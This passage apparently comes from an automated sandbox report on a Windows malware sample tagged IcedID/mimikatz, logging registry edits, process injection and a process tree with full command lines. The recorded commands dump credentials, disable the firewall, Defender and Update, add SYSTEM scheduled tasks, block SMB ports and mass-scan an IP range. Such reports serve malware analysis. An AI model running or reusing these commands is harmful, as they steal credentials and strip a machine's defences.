Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" suahuuu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing suahuuu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ suahuuu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" suahuuu.exe Key created \REGISTRY\USER\.DEFAULT\Software gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" suahuuu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gbvdtzbdv.exe -
Modifies registry class 14 IoCs
Processes:
suahuuu.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ suahuuu.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
suahuuu.exepid process 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 668 668 668 668 668 668 668 668 668 668 668 668 668 668 668 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exepid process 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exesuahuuu.exesuahuuu.exevfshost.exegbvdtzbdv.exebgjnyg.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exedescription pid process Token: SeDebugPrivilege 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1796 suahuuu.exe Token: SeDebugPrivilege 2472 suahuuu.exe Token: SeDebugPrivilege 3692 vfshost.exe Token: SeDebugPrivilege 960 gbvdtzbdv.exe Token: SeLockMemoryPrivilege 3416 bgjnyg.exe Token: SeLockMemoryPrivilege 3416 bgjnyg.exe Token: SeDebugPrivilege 2552 gbvdtzbdv.exe Token: SeDebugPrivilege 432 gbvdtzbdv.exe Token: SeDebugPrivilege 3576 gbvdtzbdv.exe Token: SeDebugPrivilege 960 gbvdtzbdv.exe Token: SeDebugPrivilege 2864 gbvdtzbdv.exe Token: SeDebugPrivilege 2116 gbvdtzbdv.exe Token: SeDebugPrivilege 2156 gbvdtzbdv.exe Token: SeDebugPrivilege 4260 gbvdtzbdv.exe Token: SeDebugPrivilege 2380 gbvdtzbdv.exe Token: SeDebugPrivilege 1064 gbvdtzbdv.exe Token: SeDebugPrivilege 3724 gbvdtzbdv.exe Token: SeDebugPrivilege 2136 gbvdtzbdv.exe Token: SeDebugPrivilege 6180 gbvdtzbdv.exe Token: SeDebugPrivilege 4400 gbvdtzbdv.exe Token: SeDebugPrivilege 6536 gbvdtzbdv.exe Token: SeDebugPrivilege 5944 gbvdtzbdv.exe Token: SeDebugPrivilege 5224 gbvdtzbdv.exe Token: SeDebugPrivilege 6796 gbvdtzbdv.exe Token: SeDebugPrivilege 6668 gbvdtzbdv.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exesuahuuu.exesuahuuu.exexohudmc.exenspfoo.exesuahuuu.exesuahuuu.exepid process 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe 1796 suahuuu.exe 1796 suahuuu.exe 2472 suahuuu.exe 2472 suahuuu.exe 3864 xohudmc.exe 2748 nspfoo.exe 4856 suahuuu.exe 4856 suahuuu.exe 5936 suahuuu.exe 5936 suahuuu.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.execmd.exesuahuuu.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 3752 wrote to memory of 1064 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe cmd.exe PID 3752 wrote to memory of 1064 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe cmd.exe PID 3752 wrote to memory of 1064 3752 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe cmd.exe PID 1064 wrote to memory of 648 1064 cmd.exe PING.EXE PID 1064 wrote to memory of 648 1064 cmd.exe PING.EXE PID 1064 wrote to memory of 648 1064 cmd.exe PING.EXE PID 1064 wrote to memory of 1796 1064 cmd.exe suahuuu.exe PID 1064 wrote to memory of 1796 1064 cmd.exe suahuuu.exe PID 1064 wrote to memory of 1796 1064 cmd.exe suahuuu.exe PID 2472 wrote to memory of 1536 2472 suahuuu.exe cmd.exe PID 2472 wrote to memory of 1536 2472 suahuuu.exe cmd.exe PID 2472 wrote to memory of 1536 2472 suahuuu.exe cmd.exe PID 1536 wrote to memory of 4144 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 4144 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 4144 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 4972 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 4972 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 4972 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 1772 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 1772 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 1772 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 2288 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 2288 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 2288 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 4252 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 4252 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 4252 1536 cmd.exe cmd.exe PID 1536 wrote to memory of 4756 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 4756 1536 cmd.exe cacls.exe PID 1536 wrote to memory of 4756 1536 cmd.exe cacls.exe PID 2472 wrote to memory of 4628 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 4628 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 4628 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 4456 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 4456 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 4456 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 1728 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 1728 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 1728 2472 suahuuu.exe netsh.exe PID 2472 wrote to memory of 1928 2472 suahuuu.exe cmd.exe PID 2472 wrote to memory of 1928 2472 suahuuu.exe cmd.exe PID 2472 wrote to memory of 1928 2472 suahuuu.exe cmd.exe PID 1928 wrote to memory of 4092 1928 cmd.exe wpcap.exe PID 1928 wrote to memory of 4092 1928 cmd.exe wpcap.exe PID 1928 wrote to memory of 4092 1928 cmd.exe wpcap.exe PID 4092 wrote to memory of 3692 4092 wpcap.exe net.exe PID 4092 wrote to memory of 3692 4092 wpcap.exe net.exe PID 4092 wrote to memory of 3692 4092 wpcap.exe net.exe PID 3692 wrote to memory of 3864 3692 net.exe net1.exe PID 3692 wrote to memory of 3864 3692 net.exe net1.exe PID 3692 wrote to memory of 3864 3692 net.exe net1.exe PID 4092 wrote to memory of 3824 4092 wpcap.exe net.exe PID 4092 wrote to memory of 3824 4092 wpcap.exe net.exe PID 4092 wrote to memory of 3824 4092 wpcap.exe net.exe PID 3824 wrote to memory of 960 3824 net.exe net1.exe PID 3824 wrote to memory of 960 3824 net.exe net1.exe PID 3824 wrote to memory of 960 3824 net.exe net1.exe PID 4092 wrote to memory of 1932 4092 wpcap.exe net.exe PID 4092 wrote to memory of 1932 4092 wpcap.exe net.exe PID 4092 wrote to memory of 1932 4092 wpcap.exe net.exe PID 1932 wrote to memory of 1624 1932 net.exe net1.exe PID 1932 wrote to memory of 1624 1932 net.exe net1.exe PID 1932 wrote to memory of 1624 1932 net.exe net1.exe PID 4092 wrote to memory of 2116 4092 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1884
-
C:\Windows\TEMP\vleitjdvn\bgjnyg.exe"C:\Windows\TEMP\vleitjdvn\bgjnyg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
C:\Users\Admin\AppData\Local\Temp\2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lbbdqheb\suahuuu.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:648 -
C:\Windows\lbbdqheb\suahuuu.exeC:\Windows\lbbdqheb\suahuuu.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1796
-
C:\Windows\lbbdqheb\suahuuu.exeC:\Windows\lbbdqheb\suahuuu.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4144
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4972
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1772
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2288
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4252
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4756
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4628
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4456
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:1728
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exeC:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3864
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:960
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1624
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4000
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4652
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3712
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1964
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3620
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tdtbtjeet\biqhmcbuq\Scant.txt2⤵PID:2944
-
C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exeC:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tdtbtjeet\biqhmcbuq\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2864 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tdtbtjeet\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tdtbtjeet\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3652 -
C:\Windows\tdtbtjeet\Corporate\vfshost.exeC:\Windows\tdtbtjeet\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tubuuvthc" /ru system /tr "cmd /c C:\Windows\ime\suahuuu.exe"2⤵PID:3236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3812
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tubuuvthc" /ru system /tr "cmd /c C:\Windows\ime\suahuuu.exe"3⤵
- Creates scheduled task(s)
PID:2840 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uurhlnhtb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F"2⤵PID:640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uurhlnhtb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:5064 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lulpjluuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F"2⤵PID:2908
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2996
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lulpjluuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4688 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:2552
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:2340
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:432
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2944
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4408
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:564
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3748
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2188
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:2960
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:2764
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1472
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4832
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2996
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3112
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4296
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3752
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:768 -
C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exeC:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 788 C:\Windows\TEMP\tdtbtjeet\788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:960 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:2340
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2960 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:432
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:3620
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2960
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:1928
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:784
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:2764
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:1156
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:1132 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4424
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2408 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4000
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2016 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3864 -
C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exeC:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 384 C:\Windows\TEMP\tdtbtjeet\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2552 -
C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exeC:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 1884 C:\Windows\TEMP\tdtbtjeet\1884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:432 -
C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exeC:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2480 C:\Windows\TEMP\tdtbtjeet\2480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3576 -
C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exeC:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2628 C:\Windows\TEMP\tdtbtjeet\2628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:960 -
C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exeC:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2696 C:\Windows\TEMP\tdtbtjeet\2696.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
